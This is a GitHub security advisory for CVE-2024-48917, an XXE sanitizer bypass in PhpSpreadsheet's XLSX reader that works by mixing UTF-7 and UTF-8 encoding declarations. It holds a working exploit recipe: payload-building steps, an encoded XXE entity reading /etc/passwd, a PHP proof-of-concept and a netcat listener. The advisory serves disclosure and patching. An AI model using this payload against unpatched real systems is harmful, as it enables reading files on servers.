ghsa-7cc9-j4mv-vcjp
Vulnerability from github
Summary
The XmlScanner class has a scan method which should prevent XXE attacks.
However, we found another bypass than the previously reported CVE-2024-47873
, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using a payload in the encoding UTF-7, and adding at end of the file a comment with the value encoding="UTF-8"
with "
, which is matched by the first regex, so that encoding='UTF-7'
with single quotes '
in the XML header is not matched by the second regex:
$patterns = [
'/encoding\\s*=\\s*"([^"]*]?)"/',
"/encoding\\s*=\\s*'([^']*?)'/",
];
A payload for the workbook.xml
file can for example be created with CyberChef&input=Pz4KPCFET0NUWVBFIGZvbyBbCiAgPCFFTEVNRU5UIGZvbyBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0%2BCjxmb28%2BJnh4ZTs8L2Zvbz4K).
If you open an Excel file containing the payload from the link above stored in the workbook.xml
file with PhpSpreadsheet, you will receive an HTTP request on 127.0.0.1:12345
. You can test that an HTTP request is created by running the nc -nlvp 12345
command before opening the file containing the payload with PhpSpreadsheet.
To create the payload you need:
1. Create a file containing <?xml version = "1.0" encoding='UTF-7'
in an XML file
2. Use the link attached above to create your XXE payload and add it to the XML file.
3. Add +ADw-+ACE---encoding="UTF-8"--+AD4-
to the end of the XML file, which is matched by the first regex.
PoC
- Create a new folder.
- Run the
composer require phpoffice/phpspreadsheet
command in the new folder. - Create an
index.php
file in that folder with the following content: ```PHP <?php require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Xlsx;
$spreadsheet = new Spreadsheet();
$inputFileType = 'Xlsx'; $inputFileName = './payload.xlsx';
/ Create a new Reader of the type defined in $inputFileType / $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType); / Advise the Reader that we only want to load cell data / $reader->setReadDataOnly(true);
$worksheetData = $reader->listWorksheetInfo($inputFileName);
foreach ($worksheetData as $worksheet) {
$sheetName = $worksheet['worksheetName'];
echo "
$sheetName
"; / Load $inputFileName to a Spreadsheet Object / $reader->setLoadSheetsOnly($sheetName); $spreadsheet = $reader->load($inputFileName);$worksheet = $spreadsheet->getActiveSheet(); print_r($worksheet->toArray());
}
``
- Run the following command:
php -S 127.0.0.1:8080`
- Add the payload.xlsx file in the folder and open https://127.0.0.1:8080 in a browser. You will see an HTTP request on netcat http://127.0.0.1:12345/ext.dtd.
Impact
An attacker can bypass the sanitizer and achieve an XXE attack.
{ "affected": [ { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.29.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.0.0" }, { "fixed": "2.1.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.3.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "3.3.0" }, { "fixed": "3.4.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-48917" ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T20:01:46Z", "nvd_published_at": "2024-11-18T20:15:05Z", "severity": "HIGH" }, "details": "### Summary\n\nThe [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks.\n\nHowever, we found another bypass than the previously reported `CVE-2024-47873`, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using a payload in the encoding UTF-7, and adding at end of the file a comment with the value `encoding=\"UTF-8\"` with `\"`, which is matched by the first regex, so that `encoding=\u0027UTF-7\u0027` with single quotes `\u0027` in the XML header is not matched by the second regex: \n\n```\n $patterns = [\n \u0027/encoding\\\\s*=\\\\s*\"([^\"]*]?)\"/\u0027,\n \"/encoding\\\\s*=\\\\s*\u0027([^\u0027]*?)\u0027/\",\n ];\n``` \n\nA payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text(\u0027UTF-7%20(65000)\u0027)\u0026input=Pz4KPCFET0NUWVBFIGZvbyBbCiAgPCFFTEVNRU5UIGZvbyBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0%2BCjxmb28%2BJnh4ZTs8L2Zvbz4K).\nIf you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet.\n\nTo create the payload you need:\n1. Create a file containing `\u003c?xml version = \"1.0\" encoding=\u0027UTF-7\u0027` in an XML file\n2. Use the link attached above to create your XXE payload and add it to the XML file. \n3. Add `+ADw-+ACE---encoding=\"UTF-8\"--+AD4-` to the end of the XML file, which is matched by the first regex. \n\n### PoC\n\n[payload.xlsx](https://github.com/user-attachments/files/17375792/payload.xlsx)\n\n- Create a new folder.\n- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.\n- Create an `index.php` file in that folder with the following content:\n```PHP\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Xlsx;\n\n$spreadsheet = new Spreadsheet();\n\n$inputFileType = \u0027Xlsx\u0027;\n$inputFileName = \u0027./payload.xlsx\u0027;\n\n/** Create a new Reader of the type defined in $inputFileType **/\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);\n/** Advise the Reader that we only want to load cell data **/\n$reader-\u003esetReadDataOnly(true);\n\n$worksheetData = $reader-\u003elistWorksheetInfo($inputFileName);\n\nforeach ($worksheetData as $worksheet) {\n\n$sheetName = $worksheet[\u0027worksheetName\u0027];\n\necho \"\u003ch4\u003e$sheetName\u003c/h4\u003e\";\n/** Load $inputFileName to a Spreadsheet Object **/\n$reader-\u003esetLoadSheetsOnly($sheetName);\n$spreadsheet = $reader-\u003eload($inputFileName);\n\n$worksheet = $spreadsheet-\u003egetActiveSheet();\nprint_r($worksheet-\u003etoArray());\n\n}\n```\n- Run the following command: `php -S 127.0.0.1:8080`\n- Add the [payload.xlsx](https://github.com/user-attachments/files/17375792/payload.xlsx) file in the folder and open \u003chttps://127.0.0.1:8080\u003e in a browser. You will see an HTTP request on netcat \u003chttp://127.0.0.1:12345/ext.dtd\u003e.\n\n### Impact\n\nAn attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).\n", "id": "GHSA-7cc9-j4mv-vcjp", "modified": "2024-11-18T22:45:37Z", "published": "2024-11-18T20:01:46Z", "references": [ { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-7cc9-j4mv-vcjp" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48917" }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php" }, { "type": "WEB", "url": "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "type": "CVSS_V3" } ], "summary": "XXE in PHPSpreadsheet\u0027s XLSX reader" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.